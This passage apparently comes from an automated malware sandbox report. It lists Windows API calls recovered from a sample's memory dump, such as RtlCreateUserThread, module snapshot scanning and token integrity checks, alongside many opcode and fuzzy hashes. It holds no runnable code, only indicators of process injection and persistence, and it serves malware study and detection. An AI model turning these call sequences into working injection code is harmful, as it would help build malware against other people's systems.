                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040187F
                                                                                                                                                                                                            • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004018A0
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000), ref: 004018BC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                            • API String ID: 3542510048-3024904723
                                                                                                                                                                                                            • Opcode ID: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                            • Instruction ID: aea8cd550169bae8ca71061e7f9b66115ece3b9acf575b2a14c75ec5d6601f55
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1071A4B1A00315ABE7109F94DD89FAF77B8EF88701F158039FA01B72D1D7789A458768
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D27
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                            • SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,?), ref: 00401D9A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,kernel), ref: 00401DBC
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401DC8
                                                                                                                                                                                                            • Module32Next.KERNEL32(00000000,00000224), ref: 00401DD6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                            • String ID: .dll$kernel
                                                                                                                                                                                                            • API String ID: 2979424695-2375045364
                                                                                                                                                                                                            • Opcode ID: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                            • Instruction ID: c283e2339ecb9e17340db761c1aee5b765af185a9d94a0bcce3757d144b29585
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8621AB72A012146BD710ABA5AD4CFDF77A89F99321F100276EA14F32E0EA34ED458768
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004034C9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                            • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                            • API String ID: 4133869067-1576788796
                                                                                                                                                                                                            • Opcode ID: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                            • Instruction ID: a2ec502b7bb4083542b5d35a97e2222aece09e1ccb5a5fef7106c32bda11fc1e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 150165B5A00218FBEB24DFA0DD48F9A7BBCAB44B06F0080A5E609B2191D6749B44DF65
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: VUUU
                                                                                                                                                                                                            • API String ID: 0-2040033107
                                                                                                                                                                                                            • Opcode ID: f79c7f42cc70f7068980618b596982cd5e35ccfe9f944101c43b8ac65fe0c5e4
                                                                                                                                                                                                            • Instruction ID: 83c8b6d4ae9392d60502dd360fb7ca1817b1c3f4776dddc770d92cd40da689bc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f79c7f42cc70f7068980618b596982cd5e35ccfe9f944101c43b8ac65fe0c5e4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8FC1F571A4065647C728CF69C5902BAFBF1BF98310F08A12FD4D2D6B81E338E555CB55
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 020a8c1551cdac237fbd27fc613c63b8374db010d48759c7608309d9e20808df
                                                                                                                                                                                                            • Instruction ID: 49f4f21d9b48f79dac2c560b4f9f45e3af11d3fe5a8b8c575f21095663944224
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 020a8c1551cdac237fbd27fc613c63b8374db010d48759c7608309d9e20808df
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 466217302083668FE711CF349998AAB7BE4EF9B342F448559E881C7372DB35C949C799
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 8be546a5801d80e10960c8fac69fe55b4532605c50e249de703d82068b70ae38
                                                                                                                                                                                                            • Instruction ID: 819080bdcba4aba2f410b402834f39c633db381555cbfe7eca53d93c247e6cbf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8be546a5801d80e10960c8fac69fe55b4532605c50e249de703d82068b70ae38
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6362AD70E00A269BDB0CCF55C8906EDB7B2FF84311F14826EC81667B84DB78A955DF94
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c2ea4baa25f466abac0af4e06c27490f445ebf81a1911c24c4fc019493ca33d5
                                                                                                                                                                                                            • Instruction ID: c7ae1df08a76fa61e3c99c46e8343ff6a04015de72be0cc750c2f716a6a279e4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2ea4baa25f466abac0af4e06c27490f445ebf81a1911c24c4fc019493ca33d5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F442D171900A499FDB14DFA8C880AEFBBF5EF4C308F14555EE446A7341D738A946CBA8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 9024046f4ec778ac0f2bc939b39aa8ef5a284e4206ce7968b5d9ca164917f460
                                                                                                                                                                                                            • Instruction ID: 296f88951ecf7cea7bff09f9537e53bf2d2ecc764958e0785ba560d75f276c2e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9024046f4ec778ac0f2bc939b39aa8ef5a284e4206ce7968b5d9ca164917f460
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6112E5306017849FEB25CF18C5906AEBBF1BF46310F16855AE8E54B792C338ED46CB56
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: d68117118ec2e5c05b55bad5372fd5ac0e5d8e685fa30279994fb4ae286abc12
                                                                                                                                                                                                            • Instruction ID: 373094f0e44d4ed5b4a76297d3e75846c5555569b6fb32489a2bef93388bd825
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d68117118ec2e5c05b55bad5372fd5ac0e5d8e685fa30279994fb4ae286abc12
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C812D230A00B859FEF21CF18C590AAEB7F1FF95310F14855AE8A64B792C338AD46CB55
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: f4f35a6acd8340eba5d2f955567a6f50c4cb051c9736d012dfe4b0e1d8c61a05
                                                                                                                                                                                                            • Instruction ID: cfa054cb93e044cdae65f2de48f0eb828664dc1768648188419bb013471483e8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4f35a6acd8340eba5d2f955567a6f50c4cb051c9736d012dfe4b0e1d8c61a05
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA12D530A057849FEB25CF18C490AAABBF1EF53314F15855EE8E54B391C338AD46CB66
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: fe7f905eb35857b92b021dee202d37908d4751a86c5a789a819d9c595c827d8a
                                                                                                                                                                                                            • Instruction ID: c484f8b887487c68eb1831faa77cd2835b2ef54b83a3a9b38c3ea20a6c7484b0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe7f905eb35857b92b021dee202d37908d4751a86c5a789a819d9c595c827d8a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA12D430A017859FEB21CF18C58079ABBF1FF96310F19855AE8A59B381D338ED46CB65
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 53e7ffd853d592cf597099417c9d39be36ad4c569da498972a57c8cd5ff369e0
                                                                                                                                                                                                            • Instruction ID: 9417f9ed4064ddd1c3f6edb80d8f66b01d291d1ab21ea86703028fde516e46eb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 53e7ffd853d592cf597099417c9d39be36ad4c569da498972a57c8cd5ff369e0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E02F530A007459FEB20CF28C6906AFB7F1FF41310F55855AF8A54B391D778A986CBA5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: d05b39787be36e928b4378603e27f9990888dd59e2b3d0c943f83313aa68d1ff
                                                                                                                                                                                                            • Instruction ID: 0e2bac03be3182a769e9f59211ddb04f7312f67a2832feff6941ae3a6f9bab68
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d05b39787be36e928b4378603e27f9990888dd59e2b3d0c943f83313aa68d1ff
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9002F730A007459FEB24CF18C490AAFB7F1FF41715F14855AE8A68B391D738AE86CB65
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 55b5801493426abadb834ca846d8a52c21ce2827cde252f62827ee7d0c6f5e5b
                                                                                                                                                                                                            • Instruction ID: 647bc1efc872d410d83d31efe28936287375966dcf2aa8afc27d93c91c757f48
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55b5801493426abadb834ca846d8a52c21ce2827cde252f62827ee7d0c6f5e5b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6102F530A017459FEB24CF18C4906AFB7F1FF91711F14855AE8A58B391D338AE96C794
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 396aa218b2957ca5b0e965eb8cf056d2cb0237b26e316daf33891388054dd60e
                                                                                                                                                                                                            • Instruction ID: 5041421aec073d2b688b2073802020d7c79b1bca3df2cb6ef25812ac66b41e1f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 396aa218b2957ca5b0e965eb8cf056d2cb0237b26e316daf33891388054dd60e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA02D430A017459FEB24CF18C590AAFB7F1FF91310F14855AE8A65B3A1D738AD82C7A5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: a7c18765ffabcd41aad65eb0c58c77c2c909a4c9b1e3ad7c8c9eb5d5d1b42954
                                                                                                                                                                                                            • Instruction ID: a657eec15ca3c5bb160301247c07cdb44cfdd935969e5cbf472f05e5335aa939
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7c18765ffabcd41aad65eb0c58c77c2c909a4c9b1e3ad7c8c9eb5d5d1b42954
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6F19E71A00619ABDB20CF98C980BAFB7A5EF89314F10417EED05A7382D779DD41CBA5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 11c0ee598e7aeb21dc1fcf675ea2201926a005ebd3ef75b4a8992ce9a24da684
                                                                                                                                                                                                            • Instruction ID: 1bcbb60a4870fb6f7824f06d04ae27aaebc780d04162e94b05afeb65d1883275
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11c0ee598e7aeb21dc1fcf675ea2201926a005ebd3ef75b4a8992ce9a24da684
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94124A71E002198FCF18CF99C9906AEFBF2FF88314F18916AD859AB754D738A941CB54
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: d4ecfbb76b5ff75ca8ce42069abc9beb288d772322e9fc4374153c29d3e72997
                                                                                                                                                                                                            • Instruction ID: f2c5ae519af86c61090003759672b7809cd436e53f2fd5b45b2c1165b140046f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4ecfbb76b5ff75ca8ce42069abc9beb288d772322e9fc4374153c29d3e72997
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EAE12A309417859FFB25CF28C4906AEBBF1EF52310F1882AFD5E55B392C238A956C758
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: a2199f9d5ef3831119798c1dc9bd5d1b85a9c125d43dbf3cc54136715279e40c
                                                                                                                                                                                                            • Instruction ID: 3d5b5479c895319a2c4470d34a8ff6393b73061c9a225c3785347aa2e70d1fa5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2199f9d5ef3831119798c1dc9bd5d1b85a9c125d43dbf3cc54136715279e40c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DE10330E045458FDB08CF68C9806ADBBF3EF89310B28C1AED495DB346D639EA46CB55
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: e4f8c752663e60b2715eb80ca10e498db60ca875b2efaa2d9ab2dd7c96a0f916
                                                                                                                                                                                                            • Instruction ID: 8b1a689c82d0fe3ee89c344c2f7eab184c0c6edd59e3ba46ea3345da4373e9f6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e4f8c752663e60b2715eb80ca10e498db60ca875b2efaa2d9ab2dd7c96a0f916
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1ED13576E0021A8FCB18CF99C9815AEFBB2FF98310F25956AD815BB704D734A911CF94
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                            • Instruction ID: 661d4224e0226a62dc5565bcde94e6aa946e1ef99945e038f73d7b47cfba27f7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7917371D01215AFDB50EFA5C840B9EB7B5AF88304F26847EE805B7381D738AD11CBA8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
                                                                                                                                                                                                            • Instruction ID: e1d19a3f0243f14b79b01c451a6d6cb00abb7833888d4a0596576d76429fa551
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E81C5319893918BC795DF38C8D65D6BBB1EE4322432E85DDC8940EA03E22F651BDF51
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 3090cd04c4ac406685f1ab0f7046645eb9a7970325283ab6b837acbd2454e769
                                                                                                                                                                                                            • Instruction ID: 91c87d25872e839baae7933b1d26ceab25bf760725ff438016367df0c9695c0c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3090cd04c4ac406685f1ab0f7046645eb9a7970325283ab6b837acbd2454e769
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E51B333F215214BE348EA7ACC8415A73D3EBCA31075AC63AD901DB395E974E96396C4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 7928e8e2b48241c328333a21e1eda0a8dfd2b13abab1239be22144118d9f0051
                                                                                                                                                                                                            • Instruction ID: f12356c3dda02b0944d66f82227427b0d7e0263a6395cb29892584ed5db79ad8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7928e8e2b48241c328333a21e1eda0a8dfd2b13abab1239be22144118d9f0051
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19517C7190D3918BD311CF2AC48066BBBE1AFD9314F044E6EF8C4A7352D7798A458B96
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
                                                                                                                                                                                                            • Instruction ID: 448e8c8128ee218613f355b6a59d53b40018dab5e4ac80cca173ede8df55363b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4141C277E51A3947F3188949CD81744AA52ABCC324F2B83B5CD2C6B356D8B9ED039AD0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c32c7c64c535abbb448f0f017838c40942559ebacb89743a81205ea225361776
